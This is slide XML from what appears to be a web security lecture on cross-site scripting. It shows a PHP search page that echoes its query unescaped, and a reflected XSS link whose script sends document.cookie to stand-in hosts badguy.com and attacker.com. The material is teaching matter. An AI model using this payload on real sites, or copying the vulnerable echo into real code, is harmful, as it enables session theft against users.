          <a:xfrm rot="1068865">
            <a:off x="2714625" y="370522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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12307" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324350"/>
            <a:ext cx="3352800" cy="11620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12308" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2894013"/>
            <a:ext cx="3211512" cy="6873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309" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2846388" y="2749550"/>
            <a:ext cx="2305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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>send valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12310" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="304800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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12311" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2028825" y="400685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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C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4448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XSS example: vulnerable site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1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305800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>search field on victim.com:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://victim.com/search.php ? term = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Server-side implementation of  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;HTML&gt;    &lt;TITLE&gt; Search Results &lt;/TITLE&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;BODY&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Results for &lt;?php echo $_GET[term] ?&gt; :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/BODY&gt;   &lt;/HTML&gt;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505200" y="4495800"/>
            <a:ext cx="4876800" cy="1998663"/>
            <a:chOff x="3505200" y="4495800"/>
            <a:chExt cx="4876800" cy="1998031"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13317" name="Rounded Rectangle 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505200" y="4495800"/>
              <a:ext cx="4419600" cy="609600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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13318" name="Freeform 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5580993" y="5155324"/>
              <a:ext cx="1387366" cy="614855"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1387366 w 1387366"/>
                <a:gd name="T1" fmla="*/ 614855 h 614855"/>
                <a:gd name="T2" fmla="*/ 504497 w 1387366"/>
                <a:gd name="T3" fmla="*/ 409904 h 614855"/>
                <a:gd name="T4" fmla="*/ 0 w 1387366"/>
                <a:gd name="T5" fmla="*/ 0 h 614855"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1387366"/>
                <a:gd name="T10" fmla="*/ 0 h 614855"/>
                <a:gd name="T11" fmla="*/ 1387366 w 1387366"/>
                <a:gd name="T12" fmla="*/ 614855 h 6148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87366" h="614855">
                  <a:moveTo>
                    <a:pt x="1387366" y="614855"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1061545" y="563617"/>
                    <a:pt x="735725" y="512380"/>
                    <a:pt x="504497" y="409904"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273269" y="307428"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="0"/>
                  </a:cubicBez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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13319" name="TextBox 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6156391" y="5785945"/>
              <a:ext cx="2225609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mtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>echo search term </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>into response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043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838200" y="1676400"/>
            <a:ext cx="7848600" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCFFFF"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/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 smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C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772400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad input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28600" y="1143000"/>
            <a:ext cx="2590800" cy="4572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 smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12953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305800" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consider link:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(properly URL encoded)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</a:rPr>
              <a:t>http://victim.com/search.php ? term =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</a:rPr>
              <a:t>		&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.open</a:t>
            </a:r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</a:rPr>
              <a:t>(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</a:rPr>
              <a:t>			“http://badguy.com?cookie = </a:t>
            </a:r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” </a:t>
            </a:r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</a:rPr>
              <a:t>+ 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</a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r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</a:rPr>
              <a:t> )  &lt;/script</a:t>
            </a:r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</a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>What if user clicks on this link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser goes to    victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>search.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Victim.com returns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buSzTx/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9900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;HTML&gt; Results for &lt;script&gt; … &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser executes script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sends badguy.com   cookie  for victim.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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23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62000" y="2247900"/>
            <a:ext cx="6875463" cy="4076700"/>
            <a:chOff x="762000" y="2247900"/>
            <a:chExt cx="6875463" cy="4076700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15380" name="Rectangle 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="762000" y="5257800"/>
              <a:ext cx="4648200" cy="1066800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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15381" name="Rectangle 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4381500" y="2247900"/>
              <a:ext cx="3255963" cy="295275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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="TextBox 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4667250"/>
            <a:ext cx="5334000" cy="1962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marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;html&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Results for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  window.open(http://attacker.com? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  ... document.cookie ...) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364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838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15365" name="Picture 18" descr="toshiba_satellite_a105_s4284_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1436688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1" descr="CompaqAlphaServerES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0738" y="4446588"/>
            <a:ext cx="11557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4" descr="DS15server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4188" y="609600"/>
            <a:ext cx="2436812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5943600" y="228600"/>
            <a:ext cx="1693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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15369" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6773863" y="4019550"/>
            <a:ext cx="176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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim Server </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15370" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1069975"/>
            <a:ext cx="3211512" cy="6873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 type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15371" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="2971800"/>
            <a:ext cx="1557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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15372" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2392363" y="982663"/>
            <a:ext cx="2192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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user gets bad link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15373" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="2743200"/>
            <a:ext cx="4572000" cy="1447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5374" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1101636">
            <a:off x="3044825" y="2986088"/>
            <a:ext cx="2570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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user clicks on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15375" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3300413" y="3665538"/>
            <a:ext cx="3000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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim echoes user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15376" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="3105150"/>
            <a:ext cx="5021263" cy="16192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25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="1944688"/>
            <a:ext cx="4457700" cy="64611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rgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://victim.com/search.php ? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"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rgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> term = &lt;script&gt; ... &lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458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4362450"/>
            <a:ext cx="53340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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2"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B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>www.victim.com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76600" y="1639888"/>
            <a:ext cx="44577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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2"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B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>www.attacker.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175021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XSS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387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 XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Methods for injecting malicious code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Reflected XSS (“type 1”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>the attack script is reflected back to the user as part of a page from the victim site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Stored XSS (“type 2”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>the attacker stores the malicious code in a resource managed by the web application, such as a database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Others, such as DOM-based attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="244408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web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Safely browse the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Users should be able to visit a variety of web sites, without incurring harm:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No stolen information (without user’s permission)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Site A cannot compromise session at Site B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Applications delivered over the web should have the same security properties we require for stand-alone applications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838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basic scenario: reflected XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17411" name="Picture 18" descr="toshiba_satellite_a105_s4284_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01913"/>
            <a:ext cx="1436688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1" descr="CompaqAlphaServerES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9475" y="4979988"/>
            <a:ext cx="11557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DS15server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4188" y="1905000"/>
            <a:ext cx="2436812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943600" y="1524000"/>
            <a:ext cx="1693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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server</a:t>
            </a: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5562600" y="4552950"/>
            <a:ext cx="1760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660066"/>
